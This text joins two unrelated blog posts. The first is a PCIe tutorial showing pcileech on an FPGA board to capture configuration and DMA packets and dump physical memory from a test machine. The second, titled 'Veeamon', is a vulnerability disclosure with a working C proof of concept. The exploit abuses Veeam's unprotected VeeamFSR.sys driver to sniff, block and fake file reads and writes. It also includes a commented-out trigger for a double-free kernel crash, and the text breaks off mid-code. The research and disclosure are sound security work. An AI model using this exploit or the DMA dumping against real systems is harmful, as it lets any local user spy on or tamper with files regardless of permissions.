Image © Advanced Micro Devices, Inc

FPGAs are a very difficult space to break into. For a beginner book on FPGAs, I highly recommend this new book from No Starch (Russell Merrick): Getting Started with FPGAs. However, to use the Pcileech project, you can purchase one of the boards listed under the project compatibility page on GitHub and use it without any FPGA knowledge.

For my project, I am using my Alinx AX7A035 PCIe 2.0 Development Board. This is a surprisingly cheap PCIe-capable FPGA board, and Alinx has proven to me to be a fantastic company to work with as an individual. Their prices are super reasonable for their power, the company provides vast documentation of their boards and schematics, and they also provide example projects for all of the major features of the board. I highly recommend their boards to anyone interested in FPGAs.

While the pcileech project does not have any support for the AX7A035 board, it does have support for the same FPGA as the one used on the AX7A035. I had to manually port the project to this Alinx board myself by porting the HDL. Hopefully this port will provide interested parties with a cheap alternative to the boards supported by the pcileech project as-is.

In the project port, the device uses Gigabit Ethernet to send and receive the TLPs instead of USB 3.0. Gigabit Ethernet achieves about 32 MB/s for pcileech memory dumping, which is fairly slow compared to the USB 3.0 speeds achieved by other pcileech devices (130 MB/s). However, the board does not have an FT601 USB 3.0 chip to interface with, so the next fastest thing I can easily use on this board is Ethernet.

In this DMA setup, I have the Ethernet cord attached to the system the device is attacking. This means the system can send UDP packets to perform DMA with itself.

A link to the ported design will be available soon on my GitHub.

image-20240326142707941

Shown: DMA setup. Alinx AX7A035 FPGA connected to a U4321 Slot Interposer connected to an AMD Zen 3 M-ITX Motherboard

Experiment - Viewing Configuration Space Packets

For more information about TLPs, please see Part 1 and Part 2 of my PCIe blog post series.

The first part of this experiment will be viewing what a Configuration Read Request (CfgRd) packet looks like under the analyzer. The target machine is a basic Ubuntu 22.04 Server running on a Zen 3 Ryzen 5 platform. This version of the OS does not have IOMMU support for AMD and therefore does not attempt to protect any of its memory. There is nothing special about the target machine other than the FPGA device plugged into it.

The first command we’re going to execute is the lspci command, which is a built-in Linux command used to list PCI devices connected to the system. This command provides a similar functionality to what Device Manager on Windows provides.

image-20240326145208649

Using this command, we can find that the pcileech device is located at BDF 2a:00.0. This is bus 2a, device 00, and function 0.

The next command to execute is sudo lspci -vvv -s 2a:00.0 which will dump all configuration space for the given device.

  • -vvv means maximum verbosity. We want it to dump all information it can about configuration space.
  • -s 2a:00.0 means only dump the configuration space of the device with BDF 2a:00.0, which we found above.

image-20240326145353913

Here we see a full printout of all of the details of the individual bits of each of the Capabilities in configuration space. We can also see that this pcileech device is masquerading as an Ethernet device, despite not providing any Ethernet functionality.

Now, let’s prepare the protocol analyzer to capture the CfgRd packets from the wire. This is done by triggering on TLPs sent over the link and filtering out all Data Link and Physical Layer packets that we do not care to view.

image-20240325162736643

Filter out all packets that are not TLPs since we only care about capturing TLPs in this experiment

image-20240325162741935

Now adding a trigger to automatically begin capturing packets as soon as a TLP is sent or received

With this set up, we can run the analyzer and wait for it to trigger on a TLP being sent or received. In this case, we are expecting the target machine to send CfgRd TLPs to the device to read its configuration space. The device is expected to respond with Completions with Data TLPs (CplD TLPs) containing the payload of the response to the configuration space read.

image-20240325162911910

Capture showing CfgRd and CplD packets for successful reads and completions

image-20240325162934758

In the above packet overview, we can see a few interesting properties of the packets listed by the analyzer.

  • We can see the CfgRd_0 packet is going Downstream (host -> device)
  • We can see the CplD for the packet is going Upstream (device -> host)
  • Under Register Number we see the offset of the 4-byte DWORD being read
  • Under Payload we can see the response data. For offset 0, this is the Vendor ID (2 bytes) and Device ID (2 bytes). 10EE is the vendor ID for Xilinx and 0666 is the device ID of the Ethernet device, as seen above in the lspci output.
  • We can see it was a Successful Completion.
  • We can see the Requester ID was 00:00.0 which is the Root Complex.
  • We can see the Completer ID was 1A:00.0 which is the Device.

Cool! Now let’s look at the individual packet structures of the TLPs themselves:

image-20240325162947215

The TLP structure for the CfgRd for a 4-byte read of offset 0x00

Here we can see the structure of a real TLP generated from the AMD Root Complex and going over the wire to the FPGA DMA device. There are a few more interesting fields now to point out:

  • Type: 0x4 is the type ID for CfgRd_0.
  • Sequence Number: Each TLP sent over the link carries a sequence number that starts at 0x00 and increments by 1. The receiver acknowledges the TLP with an Ack Data Link Layer packet (not shown), ensuring every packet is confirmed as received.
  • Length: The Length field of this packet is set to 0x01, meaning it wants to read 1 DWORD of configuration space.
  • Tag: The Tag is set to 0x23. The Completion containing the data read from config space must carry the same Tag of 0x23 so that the request and response can be matched up.
  • Register Number: We are reading from offset 0x00 of config space.
  • Requester and Completer: Here we can see that the packet is marked with the sender and receiver BDFs. Remember that config space packets are sent to BDFs directly!

Finally, let’s look at the structure of the Completion with Data (CplD) for the CfgRd request.

image-20240325163005053

This is the response packet immediately sent back by the device responding to the request to read 4 bytes at offset 0.

Here are the interesting fields to point out again:

  • Type: 0x0A is the type for Completion.
  • The TLP contains Payload Data, so the Data Attr Bit (D) is set to 1.
  • The Completer and Requester IDs remain the same. The switching hierarchy knows to return Completions back to their requester ID.
  • The Tag is 0x23, which means this is the completion responding to the above packet.
  • This packet has a Payload of 1 DWORD, which is 0xEE106606. Read as two little-endian 2-byte values, this is 0x10EE and 0x0666.

We can also verify the same bytes of data were returned through a raw hex dump of config space:

image-20240325163706737

Experiment - Performing and Viewing DMA to System RAM

Setup

For the final experiment, let’s do some DMA from our FPGA device to the target system! We will do this by using pcileech to send a request to read an address and length and observing the resulting data from RAM sent from the AMD Zen 3 system back to the device.

The first step is to figure out where the device is going to DMA to. Recall in the Part 2 post that the device is informed by the device driver software where to DMA to and from. In this case, our device does not have a driver installed at all for it. In fact, it is just sitting on the PCI bus after enumeration and doing absolutely nothing until commanded by the pcileech software over the UDP connection.

To figure out where to DMA to, we can dump the full physical memory layout of the system using the following:

gbps@testbench:~/pcileech$ sudo cat /proc/iomem
00001000-0009ffff : System RAM
  00000000-00000000 : PCI Bus 0000:00
  000a0000-000dffff : PCI Bus 0000:00
    000c0000-000cd7ff : Video ROM
  000f0000-000fffff : System ROM
00100000-09afefff : System RAM
0a000000-0a1fffff : System RAM
0a200000-0a20cfff : ACPI Non-volatile Storage
0a20d000-69384fff : System RAM
  49400000-4a402581 : Kernel code
  4a600000-4b09ffff : Kernel rodata
  4b200000-4b64ac3f : Kernel data
  4b9b9000-4cbfffff : Kernel bss
69386000-6a3edfff : System RAM
6a3ef000-84ab5017 : System RAM
84ab5018-84ac2857 : System RAM
84ac2858-85081fff : System RAM
850c3000-85148fff : System RAM
8514a000-88caefff : System RAM
  8a3cf000-8a3d2fff : MSFT0101:00
    8a3cf000-8a3d2fff : MSFT0101:00
  8a3d3000-8a3d6fff : MSFT0101:00
    8a3d3000-8a3d6fff : MSFT0101:00
8a3f0000-8a426fff : ACPI Tables
8a427000-8bedbfff : ACPI Non-volatile Storage
8bedc000-8cffefff : Reserved
8cfff000-8dffffff : System RAM
8e000000-8fffffff : Reserved
90000000-efffffff : PCI Bus 0000:00
  90000000-b3ffffff : PCI Bus 0000:01
    90000000-b3ffffff : PCI Bus 0000:02
      90000000-b3ffffff : PCI Bus 0000:04
        90000000-b3ffffff : PCI Bus 0000:05
          90000000-901fffff : PCI Bus 0000:07
  c0000000-d01fffff : PCI Bus 0000:2b
    c0000000-cfffffff : 0000:2b:00.0
    d0000000-d01fffff : 0000:2b:00.0
  d8000000-ee9fffff : PCI Bus 0000:01
    d8000000-ee9fffff : PCI Bus 0000:02
      d8000000-ee1fffff : PCI Bus 0000:04
        d8000000-ee1fffff : PCI Bus 0000:05
          d8000000-d80fffff : PCI Bus 0000:08
          d8000000-d800ffff : 0000:08:00.0
          d8000000-d800ffff : xhci-hcd
          d8100000-d82fffff : PCI Bus 0000:07
          ee100000-ee1fffff : PCI Bus 0000:06
          ee100000-ee13ffff : 0000:06:00.0
          ee100000-ee13ffff : thunderbolt
          ee140000-ee140fff : 0000:06:00.0
      ee300000-ee4fffff : PCI Bus 0000:27
        ee300000-ee3fffff : 0000:27:00.3
          ee300000-ee3fffff : xhci-hcd
        ee400000-ee4fffff : 0000:27:00.1
          ee400000-ee4fffff : xhci-hcd
      ee500000-ee5fffff : PCI Bus 0000:29
        ee500000-ee5007ff : 0000:29:00.0
          ee500000-ee5007ff : ahci
      ee600000-ee6fffff : PCI Bus 0000:28
        ee600000-ee6007ff : 0000:28:00.0
          ee600000-ee6007ff : ahci
      ee700000-ee7fffff : PCI Bus 0000:26
        ee700000-ee71ffff : 0000:26:00.0
          ee700000-ee71ffff : igb
        ee720000-ee723fff : 0000:26:00.0
          ee720000-ee723fff : igb
      ee800000-ee8fffff : PCI Bus 0000:25
        ee800000-ee803fff : 0000:25:00.0
          ee800000-ee803fff : iwlwifi
      ee900000-ee9fffff : PCI Bus 0000:03
        ee900000-ee903fff : 0000:03:00.0
          ee900000-ee903fff : nvme
  eeb00000-eeefffff : PCI Bus 0000:2b
    eeb00000-eebfffff : 0000:2b:00.4
      eeb00000-eebfffff : xhci-hcd
    eec00000-eecfffff : 0000:2b:00.3
      eec00000-eecfffff : xhci-hcd
    eed00000-eedfffff : 0000:2b:00.2
      eed00000-eedfffff : ccp
    eee00000-eee7ffff : 0000:2b:00.0
    eee80000-eee87fff : 0000:2b:00.6
      eee80000-eee87fff : ICH HD audio
    eee88000-eee8bfff : 0000:2b:00.1
      eee88000-eee8bfff : ICH HD audio
    eee8c000-eee8dfff : 0000:2b:00.2
      eee8c000-eee8dfff : ccp
  eef00000-eeffffff : PCI Bus 0000:2c
    eef00000-eef007ff : 0000:2c:00.1
      eef00000-eef007ff : ahci
    eef01000-eef017ff : 0000:2c:00.0
      eef01000-eef017ff : ahci
  ef000000-ef0fffff : PCI Bus 0000:2a
    ef000000-ef000fff : 0000:2a:00.0
f0000000-f7ffffff : PCI MMCONFIG 0000 [bus 00-7f]
    f0000000-f7ffffff : pnp 00:00
  fd210510-fd21053f : MSFT0101:00
  feb80000-febfffff : pnp 00:01
  fec00000-fec003ff : IOAPIC 0
  fec01000-fec013ff : IOAPIC 1
  fec10000-fec10fff : pnp 00:05
  fed00000-fed003ff : HPET 0
    fed00000-fed003ff : PNP0103:00
  fed81200-fed812ff : AMDI0030:00
  fed81500-fed818ff : AMDI0030:00
fedc0000-fedc0fff : pnp 00:05
fee00000-fee00fff : Local APIC
  fee00000-fee00fff : pnp 00:05
  ff000000-ffffffff : pnp 00:05
100000000-24e2fffff : System RAM
  250000000-26fffffff : pnp 00:02
3fffe0000000-3fffffffffff : 0000:2b:00.0

Reserved regions removed for brevity.

In this case, for this experiment, I am going to read 0x1000 bytes (one 4096-byte page) of memory starting at the 32-bit address 0x1000, which is the start of the first System RAM range in the physical address layout:

00001000-0009ffff : System RAM

Since this is actual RAM, our DMA will be successful. If this were not memory, our request would likely receive a Completion with Unsupported Request (UR) status.

The pcileech command to execute will be:

sudo pcileech -device rawudp://ip=10.0.0.64 dump -min 0x1000 -max 0x2000

Where:

  • The FPGA device is assigned the IP address 10.0.0.64 by my LAN
  • dump is the command to execute
  • -min 0x1000 specifies to start dumping memory from this address
  • -max 0x2000 specifies to stop dumping memory at this address. This results in 0x1000 bytes being read from the device.

Analyzer Output

image-20240325175450050

From this output, you can see an interesting property of DMA: the sheer number of packets involved. The first packet here is a MemRd_32 packet headed upstream. If the address being targeted was a 64-bit address, it would use the MemRd_64 TLP. Let’s take a look at that first:

image-20240325175506903

Here we can see a few interesting things:

  • The Requester field contains the device’s BDF. This is because the device initiated the request, not the Root Complex.
  • The Address is 0x1000. This means we are requesting to read from address 0x1000 as expected.
  • The Length is 0x000, which is the number of 4-byte DWORDs to transfer. This seems a bit weird, because we are reading 4096 bytes of data. In fact, 0x000 is a special encoding meaning the maximum length. The Length field in the packet is 10 bits, so the largest non-zero value it can hold is 0x3FF, and 0x3FF * 4 = 0xFFC, which is 4 bytes too small to express 4096. Since transferring 0 bytes of data doesn't make sense, the 0x000 encoding is used to indicate the maximum, or 1024 DWORDs (4096 bytes) in this case!
  • The Tag is 0x80. We will expect all Completions to also have the same Tag to match the response to the request.

And finally, let’s look at the first Completion with Data (CplD) returned by the host:

image-20240325175529049

We can see right off the bat that this looks a whole lot like a Completion with Data for the config space read in the previous section. But in this case, it’s much larger in size, containing a total of 128 bytes of payload returned from System RAM to our device.

Some more interesting things to point out here:

  • Length: Length is 0x20 DWORDs, or 0x20*4=128 bytes of payload. This means that the resulting 4096 byte transfer has been split up into many CplD TLPs each containing 128 bytes of the total payload.
  • Byte Count: Per the PCIe spec, this 12-bit field gives the number of bytes remaining to be returned for the request, including the current completion's payload. Here it is 0x000, another special encoding: all 4096 bytes are still pending.
  • Tag: The Tag of 0x80 matches the value of our request.
  • Requester ID: This Completion found its way back to our device due to the 2A:00.0 address being marked in the requester.
  • Completer ID: An interesting change here compared to config space, but the Completer here is not the 00:00.0 Root Complex device. Instead, it is a device 00:01.3. What device is that? If we look back up at the lspci output, this is a Root Port bridge device. It appears that this platform marks the Completer of the request as the Root Port the device is connected to, not the Root Complex itself.

And just for consistency, here is the second Completion with Data (CplD) returned by the host:

image-20240325175555617

The major change here for the second chunk of 128 bytes of payload is that the Byte Count field has decremented by 0x80, the size of the previous completion, so this chunk of data will be read into the device at offset 0x80. This shouldn't be too surprising; the Byte Count will keep decrementing until it eventually reaches 0x080, which marks the final completion of the transfer. The DMA engine on the device will then recognize that the transfer is complete and mark the original 4096-byte request as complete internally.

gbps@testbench:~/pcileech$ sudo pcileech -device rawudp://ip=10.0.0.64 dump -min 0x1000 -max 0x2000

 Current Action: Dumping Memory
 Access Mode:    Normal
 Progress:       0 / 0 (100%)
 Speed:          4 kB/s
 Address:        0x0000000000001000
 Pages read:     1 / 1 (100%)
 Pages failed:   0 (0%)
Memory Dump: Successful.

Maximum Payload Size Configuration

Now only one question remains: why are there so many Completion TLPs for a single page read?

The answer lies in a specific configuration property of the device and the platform: the Maximum Payload Size.

If we look back at the configuration space of the device:

image-20240326165151290

The Device Control register has been programmed with a MaxPayload of 128 bytes, meaning the device is not allowed to send or receive any TLP with a payload larger than 128 bytes. Our 4096-byte request will therefore always be fragmented into 4096/128 = 32 completions per page.

If you notice above, there is a field DevCap: MaxPayload 256 bytes: the Device Capabilities register advertises that this device's hardware can handle payloads of up to 256 bytes. If the platform allowed 256-byte payloads, the device could cut the TLP header overhead in half, to only 16 completions per page.

It is not clear what at the platform or OS level has reduced the MaxPayload to 128 bytes. Typically it is the bridge device above the device in question that limits the MaxPayload size; in this case, however, the Root Port this device is connected to supports up to 512 bytes. With some further investigation, maybe I'll be able to discover the answer.

And there you have it, a more in-depth look into how a device performs DMA!

Conclusion

This simple experiment hopefully gives you a nicer look into the “black box” of the PCIe link. While it’s nice to see diagrams, I think it’s much sweeter to look into actual packets on the wire to confirm that your understanding is what actually happens in practice.

We saw that config space requests are simple 4-byte data accesses that use the CfgRd and CfgWr TLP types. These are separate from the MemRd/MemWr TLP types used for DMA and MMIO. We also saw how Completions can be fragmented to return a larger DMA transfer, such as a 4096-byte page, in parts.

I hope to provide more complex, or potentially more "interactive", experiments later. For now, I leave you with this as a simpler companion to Part 2 of my series.

Hope you enjoyed!

- Gbps

Veeamon

Veeam ships a signed file system filter driver with no ACL on its control device object. The driver allows controlling all IO operations on any file in a specified folder. By abusing the driver, an attacker can sniff and fake reads, writes, and other IO operations on any file in the file system, regardless of its permissions.

Some time ago, I stumbled upon the Veeam backup solution. Among other files, the installer drops VeeamFSR.sys: a file system filter driver signed by Veeam. A quick overview in IDA showed no DACL on the device object, hence full access to Everyone. So, I decided to take a deeper look. VeeamFSR exposes a set of IoCtls that allow any user-mode application to control all IO operations on the specified folder and its child objects. Once the app specifies the folder to monitor, the driver will pend all IO related to the folder and its children and notify the app about the IO. The app, in turn, can pass the IO, fail it, get the data of the IO, or even fake it. I wrote a small PoC that shows how to manipulate VeeamFSR for fun and profit.

[Setting things up]

First of all, we have to open the control device and tell the driver which folder we want to monitor. CtlCreateMonitoredFolder is a wrapper over the IOCTL_START_FOLDER_MONITORING IoCtl. This IoCtl receives the following struct as an input parameter:

struct MonitoredFolder
{
    HANDLE SharedBufSemaphore;
    DWORD d1;
    HANDLE NewEntrySemaphore;
    DWORD d2;
    DWORD f1;  //+0x10
    DWORD SharedBufferEntriesCount; //+0x14
    DWORD PathLength; //+0x18
    WCHAR PathName[0x80]; //+0x1C
};

and outputs:

struct SharedBufferDescriptor
{
    DWORD FolderIndex;
    DWORD SharedBufferLength;
    DWORD SharedBufferPtr;
    DWORD Unk;
};

Once the call to DeviceControl succeeds, VeeamFSR will pend all calls to (Nt)CreateFile that contain the monitored folder in the pathname. All such calls will end up in a non-alertable kernel-mode sleep in KeWaitForSingleObject.

ExplorerWait.png

The second important thing is to unwait these calls with the IOCTL_UNWAIT_REQUEST IoCtl. Failing to do so leads to application hangs. By the way, passing UnwaitDescriptor::UserBuffer to the IoCtl causes a double free in the driver, so if you want to kaboom the OS, this is the way to do it. (See CtlUnwaitRequest for details.)

Internally, VeeamFSR creates and maintains lists of objects that represent monitored folders, opened streams, and a few other object types, quite similar to what the Windows object manager subsystem does. Every object has a header that contains a reference counter, a pointer to the object methods, etc. The constructor of the MonitoredFolder object, among other things, creates a shared kernel-user buffer in the context of the controller app.

Contiguous.png

Funny, for some reason Veeam developers think that only a contiguous buffer can be mapped to user-mode memory.

The app receives the pointer to the buffer in the SharedBufferDescriptor::SharedBufferPtr field, which is an output parameter of the IOCTL_START_FOLDER_MONITORING IoCtl. VeeamFSR writes the parameters of IO to the buffer and notifies the app about the new entry by releasing the MonitoredFolder::NewEntrySemaphore semaphore. The controller app might manipulate the IO data in the shared buffer before unwaiting the IO request. Every entry in the buffer consists of a predefined header that identifies the IO and a body which is operation dependent:

struct CtrlBlock
{
    BYTE ProcessIndex;
    BYTE FolderIndex;
    WORD FileIndex : 10;
    WORD MajorFunction : 6;
};

struct SharedBufferEntry
{
    //header
    DWORD Flags;
    union
    {
        CtrlBlock Ctrl;
        DWORD d1;
    };

    //body
    DWORD d2;
    DWORD d3;

    DWORD d4;
    DWORD d5;
    DWORD d6;
    DWORD d7;
};

Now we have everything we need to build a basic IO pump that enables monitoring for the ‘c:\tmp’ folder, logs open calls to the console, and unwaits them. Throughout the post, I will extend the snippet by adding features such as IO monitoring, failing, and faking. See the full code on GitHub.

int wmain(int arc, wchar_t** argv)
{
    if (arc != 2)
    {
        printf("Usage: veeamon NativePathToFolder\n");
        return -1;
    }

    HANDLE hDevice = CreateFileW(L"\\\\.\\VeeamFSR", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, 0, OPEN_EXISTING, 0, 0);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("CreateFileW: %d\n", GetLastError());
        return -1;
    }

    HANDLE SharedBufSemaphore;
    HANDLE NewEntrySemaphore;
    WORD CurrEntry = 0;

    PCWCHAR Folder = argv[1];
    if (CtlCreateMonitoredFolder(
        hDevice,
        Folder,
        &SharedBufSemaphore,
        &NewEntrySemaphore) == FALSE)
    {
        printf("Failed setting up monitored folder\n");
        return -1;
    }

    printf("Set up monitor on %ls\n", Folder);
    printf("FolderIndex: 0x%x\n", SharedBufDesc.FolderIndex);
    printf("Shared buffer: %p\n", (PVOID)SharedBufDesc.SharedBufferPtr);
    printf("Shared buffer length: 0x%x\n", SharedBufDesc.SharedBufferLength);
    printf("Unknown: 0x%x\n", SharedBufDesc.Unk);
    printf("\nStarting IO loop\n");

    SharedBufferEntry* IOEntryBuffer = (SharedBufferEntry*)SharedBufDesc.SharedBufferPtr;
    SharedBufferEntry* IOEntry;

    for (;;)
    {
        LONG l;

        ReleaseSemaphore(NewEntrySemaphore, 1, &l);
        WaitForSingleObject(SharedBufSemaphore, INFINITE);

        printf("Entry #%d\n", CurrEntry);

        IOEntry = &IOEntryBuffer[CurrEntry];
        switch (IOEntry->Ctrl.MajorFunction)
        {
        //
        // IRP_MJ_XXX and FastIo handlers
        //
        case 0x0: //IRP_MJ_CREATE
        case 0x33: //Fast _IRP_MJ_CREATE
        {
            PrintEntryInfo("IRP_MJ_CREATE", IOEntryBuffer, IOEntry);
            CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_PassDown);

            break;
        }
        default:
        {
            CHAR OpName[40]{};
            sprintf_s(OpName, 40, "IRP_MJ_%d", IOEntry->Ctrl.MajorFunction);
            PrintEntryInfo(OpName, IOEntryBuffer, &IOEntryBuffer[CurrEntry]);

            break;
        }


        //
        // Special entry handlers
        //
        case 0x37: //Name entry
        {
            printf("\tADD\n");

            switch (IOEntry->d2)
            {
            case ProcessEntry:
                printf("\tprocess: %d\n", IOEntry->d6);
                ProcessMapping[IOEntry->d3] = CurrEntry;
                break;
            case FileEntry:
                //.d4 == length
                printf("\tfile: %ls\n", (PWSTR)IOEntry->d6);
                FileMapping[IOEntry->d3] = CurrEntry;
                break;
            case MonitoredEntry:
                //.d4 == length
                printf("\tmonitored dir: %ls\n", (PWSTR)IOEntry->d6);
                break;
            }

            break;
        }
        case 0x38:
        {
            printf("\tDELETION\n");
            switch (IOEntry->d2)
            {
            case ProcessEntry:
                printf("\tprocess\n");
                break;
            case FileEntry:
                printf("\tfile\n");
                break;
            case MonitoredEntry:
                printf("\tmonitored dir\n");
                break;
            }
            printf("\tindex: %d\n", IOEntry->d2);

            break;
        }
        case 0x39:
        {
            printf("\tCOMPLETION of IRP_MJ_%d, index = %d, status = 0x%x, information: 0x%x\n",
                IOEntry->d2,
                IOEntry->d3,
                IOEntry->d4,
                IOEntry->d5);

            break;
        }
        case 0x3A:
        {
            printf("\tWRITE-related entry\n");
            break;
        }
        }

        printf("\t0x%.8x 0x%.8x  0x%.8x 0x%.8x\n", IOEntry->Flags, IOEntry->d1, IOEntry->d2, IOEntry->d3);
        printf("\t0x%.8x 0x%.8x  0x%.8x 0x%.8x\n", IOEntry->d4, IOEntry->d5, IOEntry->d6, IOEntry->d7);

        CurrEntry++;
        if (CurrEntry >= 0x200)
        {
            break;
        }
    }

    CtlDestroyFolder(hDevice, 0);
    CloseHandle(hDevice);

    printf("Press any key...\n");
    getchar();

    return 0;
}

With the snippet running on \Device\HarddiskVolume1\tmp, navigating to the 'tmp' folder triggers a bunch of open calls in Explorer.exe:

Basic.png

[Deny everything]

VeeamFSR provides several options for handling waited IO requests:

  1. Pass through the request (boring).
  2. Deny access (better).
  3. Sniff request data (toasty).
  4. Fake request data (outstanding!).

The controller app communicates its decision to the driver by passing one or more flags from the RequestFlags enum to the CtlUnwaitRequest function, which serves as a wrapper for the IOCTL_UNWAIT_REQUEST IoCtl.

enum RequestFlags : BYTE
{
    RF_CallPreHandler = 0x1,
    RF_CallPostHandler = 0x2,
    RF_PassDown = 0x10,
    RF_Wait = 0x20,
    RF_DenyAccess = 0x40,
    RF_CompleteRequest = 0x80,
};

BOOL CtlUnwaitRequest(
    HANDLE hDevice,
    CtrlBlock* Ctrl,
    WORD SharedBufferEntryIndex,
    RequestFlags RFlags
)
{
    struct UnwaitDescriptor
    {
        CtrlBlock Ctrl;

        DWORD SharedBufferEntryIndex;
        RequestFlags RFlags;
        BYTE  IsStatusPresent;
        BYTE  IsUserBufferPresent;
        BYTE  SetSomeFlag;
        DWORD Status;
        DWORD Information;
        PVOID UserBuffer;
        DWORD d6;
        DWORD UserBufferLength;
    };

    DWORD BytesReturned;
    UnwaitDescriptor Unwait = { 0, };

    Unwait.Ctrl.FolderIndex = Ctrl->FolderIndex;
    Unwait.Ctrl.MajorFunction = Ctrl->MajorFunction;
    Unwait.Ctrl.FileIndex = Ctrl->FileIndex;
    Unwait.SharedBufferEntryIndex = SharedBufferEntryIndex;
    Unwait.RFlags = RFlags;

    Unwait.IsUserBufferPresent = 0;

    // Uncomment the code below to crash the OS.
    // VeeamFSR doesn't handle this parameter correctly. Setting IsUserBuffPresent to true 
    // leads to double free in the completion rountine.
    //Unwait.UserBuffer = (PVOID)"aaaabbbb";
    //Unwait.UserBufferLength = 8;
    //Unwait.IsUserBufferPresent = 1;


    BOOL r = DeviceIoControl(hDevice, IOCTL_UNWAIT_REQUEST, &Unwait, sizeof(Unwait), 0, 0, &BytesReturned, 0);
    if (r == FALSE)
    {
        printf("UnwaitRequest failed\n");
    }
    return r;
}

Passing the RF_PassDown flag tells the driver to pass through the request. This is what we did in the previous sample. On the other hand, passing the RF_DenyAccess flag instructs VeeamFSR to fail the IRP with the status STATUS_ACCESS_DENIED. The snippet below checks the filename of the open operation and fails it if the name contains 'Cthon98.txt':

case 0x0: //IRP_MJ_CREATE
case 0x33: //Fast _IRP_MJ_CREATE
{
    PrintEntryInfo("IRP_MJ_CREATE", IOEntryBuffer, IOEntry);

    PCWCHAR ProtectedName = L"\\Device\\HarddiskVolume1\\tmp\\Cthon98.txt";
    DWORD EntryNameIndex = FileMapping[IOEntry->Ctrl.FileIndex];
    if (IsEqualPathName(&IOEntryBuffer[EntryNameIndex], ProtectedName))
    {
        printf("Denying access to %ls\n", ProtectedName);
        CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_DenyAccess);
        break;
    }

    CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_PassDown);

    break;
}

DenyAccess.png

[Sniffing writes, sniffing reads]

Accessing request data is a bit trickier. Depending on the operation, the data might be available before or after the IRP is completed. This is where the RF_CallPreHandler and RF_CallPostHandler flags come into play. VeeamFSR provides pre and post handlers for all IRP_MJ_XXX functions and maintains an array of RequestFlags values for every opened file. Each entry in the array defines how VeeamFSR should handle calls to the corresponding IRP_MJ_XXX function, regardless of whether the call was waited on or not. Setting the RF_CallPre/PostHandler flag for an entry instructs the driver to execute pre/post handlers for all calls to the function, while setting the RF_DenyAccess flag fails all requests. The default value for all functions (except IRP_MJ_CREATE) is RF_PassDown. The default for IRP_MJ_CREATE is RF_Wait.

To sniff writes, we have to enable the pre-operation handler for the IRP_MJ_WRITE function. The handler allocates memory in the controller app process, copies the write data to the allocated memory, and notifies the app by creating an IRP_MJ_WRITE entry in the shared buffer. Read sniffing works similarly, but requires a post-operation handler instead of a pre-operation one. Note that in both cases RF_PassDown should be ORed with the flags, since we still want to pass the request down the stack. The following snippet enables read and write sniffing:

case 0x0: //IRP_MJ_CREATE
case 0x33: //Fast _IRP_MJ_CREATE
{
    PrintEntryInfo("IRP_MJ_CREATE", IOEntryBuffer, IOEntry);

    FlagsDescritptor FlagsDescs[2];
    FlagsDescs[0].Function = 3; //IRP_MJ_READ
    FlagsDescs[0].RFlags = (RequestFlags)(RF_PassDown | RF_CallPostHandler);
    FlagsDescs[1].Function = 4; //IRP_MJ_WRITE
    FlagsDescs[1].RFlags = (RequestFlags)(RF_PassDown | RF_CallPreHandler);
    CtlSetStreamFlags(hDevice, &IOEntry->Ctrl, FlagsDescs, 2);

    CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_PassDown);

    break;
}
case 0x3: //IRP_MJ_READ
case 0x1D: //Fast IRP_MJ_READ
{
    PrintEntryInfo("IRP_MJ_READ", IOEntryBuffer, IOEntry);

    DWORD Length = IOEntry->d5;
    PBYTE Buffer = (PBYTE)IOEntry->d6;
    PrintBuffer(Buffer, Length);

    break;
}
case 0x4: //IRP_MJ_WRITE
case 0x1E: //Fast IRP_MJ_WRITE
{
    PrintEntryInfo("IRP_MJ_WRITE", IOEntryBuffer, &IOEntryBuffer[CurrEntry]);

    DWORD Length = IOEntry->d5;
    PBYTE Buffer = (PBYTE)IOEntry->d6;
    PrintBuffer(Buffer, Length);

    break;
}

Note that sometimes applications map files to memory instead of reading or writing them, so opening a file in Notepad does not always trigger IRP_MJ_READ/WRITE operations.

Sniff.png

[Faking reads]

Yet another delicious feature that VeeamFSR provides, namely to Everyone, is faking read data. This is what the RF_CompleteRequest flag is intended for. Setting this flag for the 3rd (IRP_MJ_READ) entry of the file's array of flags tells the driver to pend read requests and to map read buffers into the controller app's address space. The controller app can fill the buffer with fake or modified data and complete the request, passing the RF_CompleteRequest flag to apply the changes. Unwaiting a request with this flag instructs the driver to complete it using the IoCompleteRequest function instead of sending it to the actual file system driver. Thus, the controller app can fake the data of any read operation in the OS. Pure evil, eh? The following snippet fakes the content of AzureDiamond.txt with '*' symbols, while the real content of the file is the 'hunter2' string:

case 0x0: //IRP_MJ_CREATE
case 0x33: //Fast _IRP_MJ_CREATE
{
    PrintEntryInfo("IRP_MJ_CREATE", IOEntryBuffer, IOEntry);

    FlagsDescritptor FlagsDescs[2];
    DWORD EntryNameIndex = FileMapping[IOEntry->Ctrl.FileIndex];
    if (IsEqualPathName(&IOEntryBuffer[EntryNameIndex], FakeReadName))
    {
        FlagsDescs[0].Function = 3; //IRP_MJ_READ
        FlagsDescs[0].RFlags = RF_CompleteRequest;
        FlagsDescs[1].Function = 4; //IRP_MJ_WRITE
        FlagsDescs[1].RFlags = (RequestFlags)(RF_PassDown | RF_CallPreHandler);
    }
    else
    {
        FlagsDescs[0].Function = 3; //IRP_MJ_READ
        FlagsDescs[0].RFlags = (RequestFlags)(RF_PassDown | RF_CallPostHandler);
        FlagsDescs[1].Function = 4; //IRP_MJ_WRITE
        FlagsDescs[1].RFlags = (RequestFlags)(RF_PassDown | RF_CallPreHandler);
    }
    CtlSetStreamFlags(hDevice, &IOEntry->Ctrl, FlagsDescs, 2);

    CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_PassDown);

    break;
}
case 0x3: //IRP_MJ_READ
case 0x1D: //Fast IRP_MJ_READ
{
    PrintEntryInfo("IRP_MJ_READ", IOEntryBuffer, IOEntry);

    DWORD Length = IOEntry->d5;
    PBYTE Buffer = (PBYTE)IOEntry->d6;
    DWORD EntryNameIndex = FileMapping[IOEntry->Ctrl.FileIndex];
    if (IsEqualPathName(&IOEntryBuffer[EntryNameIndex], FakeReadName) == FALSE)
    {
        PrintBuffer(Buffer, Length);
    }
    else
    {
